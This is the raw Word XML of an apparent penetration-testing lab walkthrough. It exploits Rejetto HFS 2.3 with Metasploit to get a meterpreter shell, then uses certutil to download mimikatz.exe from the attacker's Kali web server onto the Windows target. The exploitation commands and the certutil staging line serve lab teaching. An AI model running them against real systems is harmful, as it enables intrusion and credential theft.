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F9B7" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCDDB2A" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D1BC0" w14:textId="532A6CCE" w:rsidR="00853ABF" w:rsidRDefault="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t> To cover the process of transferring files to Windows targets by leveraging a web server running on the Kali Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2550D80A" w14:textId="34D662AE" w:rsidR="007828B8" w:rsidRDefault="007828B8">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF0414" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274C4683" w14:textId="0378EA24" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30B85E78" wp14:editId="0F47E207">
            <wp:extent cx="5943600" cy="3343910"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="332873496" name="Picture 1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9E1DD" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t> Check if the target machine is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A9FB2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65ED4348" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve">ping -c 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A3B1645" w14:textId="07B7BF02" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C0CFA76" wp14:editId="3C6848A5">
            <wp:extent cx="5943600" cy="2315210"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="524895742" name="Picture 13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2B3C" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>The target is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D1724A" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t> Port scanning with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A6464" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>Before we can begin performing local enumeration, we will need to gain access to the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A0C32" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>To begin with, we will need to identify a vulnerable service running on the Windows target system, this can be done by performing a service version detection scan with Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0002B907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0380F360" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="05055557" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>As shown in the following screenshot, the Nmap scan reveals that there is a web server running on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7930A" w14:textId="7201BFD6" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08F144AE" wp14:editId="4DB40C47">
            <wp:extent cx="5943600" cy="2843530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="933409403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BC5D" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve"> Searching for exploits with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7006F6C0" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>The Nmap scan revealed that port 80 is running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP File Server 2.3</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t>, we can search for exploits that affect this version of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP File Server</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve"> with a tool like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve"> by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56352214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4F693CB2" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="134A53EE" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve">As shown in the following screenshot, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve"> reveals that there is a Metasploit Framework exploit module that can be used to exploit this specific version of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP File Server</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25828E14" w14:textId="38918BF9" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AE48973" wp14:editId="5032F37E">
            <wp:extent cx="5943600" cy="1342390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1981659629" name="Picture 1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6D16" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t> Gaining access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121293FA" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>To use this exploit module, we will need to start up the Metasploit Framework Console (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>), this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC38D06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020609A8" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CAD29DA" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>After starting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>, we can load the module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2B7666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506A0E9B" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>use exploit/windows/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>rejetto_hfs_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FBF2B33" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>We will now need to configure the module options, more specifically, we will need to set the target address. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E903AB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0D3E7D2F" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3155212F" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>After configuring the module options, we can execute the exploit module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E6C8E4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15B58AE1" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:lastRenderedPageBreak/>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D881E" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>As shown in the following screenshot, the exploit module runs successfully and provides us with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t> session on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667BD172" w14:textId="4C21B3EB" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C79CA22" wp14:editId="2360B600">
            <wp:extent cx="5943600" cy="2605405"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="55097801" name="Picture 1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E7A5" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>Now that we have gained access to the Windows target system, we can explore the process of transferring files to the Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A967A1" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t> Transferring files to the Windows target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F95849" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>In this case, we will be transferring the mimikatz.exe executable found under the </w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/share/windows-resources/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/x64</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t> directory on the Kali Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BCEFB2" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>To begin with, we can navigate to the directory by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4426DA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409352F6" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>/share/windows-resources/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>/x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE27211" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>We can then start a web server with </w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Python3</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t> in this directory by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003EFA0E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0B0B9294" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5602E0AD" w14:textId="0AD6793F" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="074C4D87" wp14:editId="0FF6D1AC">
            <wp:extent cx="5943600" cy="1817370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11117609" name="Picture 9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3BCF" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>We can now navigate back to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t> session on the target system, navigate to the C:\ drive and create the </w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Temp</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t> directory. This can be done by running the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046D3F22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6E1BA10A" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>cd C:\\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FDE47C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0B333999" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve"> Temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4735602C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65B75DA9" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>cd Temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469108E4" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>We will now need to spawn a command shell session on the target system by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450EED44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68B12CC2" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700EED42" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve">We can now download </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>the </w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t> executable from the web server being hosted on the Kali Linux system by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B0F491" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA30E42" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007828B8">
        <w:t>urlcache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007828B8">
        <w:t xml:space="preserve"> -f http://10.10.31.3/mimikatz.exe mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C66BA90" w14:textId="77777777" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:t>As shown in the following screenshot, the </w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="007828B8">
        <w:t> executable is downloaded successfully onto the Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10162F" w14:textId="1DCCD100" w:rsidR="007828B8" w:rsidRPr="007828B8" w:rsidRDefault="007828B8" w:rsidP="007828B8">
      <w:r w:rsidRPr="007828B8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1546D8FC" wp14:editId="6B9A6976">
            <wp:extent cx="5943600" cy="4946015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="439533773" name="Picture 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E0B76" w14:textId="77777777" w:rsidR="007828B8" w:rsidRDefault="007828B8"/>
    <w:sectPr w:rsidR="00782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DF"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="007828B8"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="009D7EDF"/>
    <w:rsid w:val="00CD65BC"/>
    <w:rsid w:val="00D8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E45B2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{886FCA3C-1213-4F31-BCE9-77FCF1DF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565</Words>
  <Characters>2941</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>71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2025-12-19T20:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-19T20:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>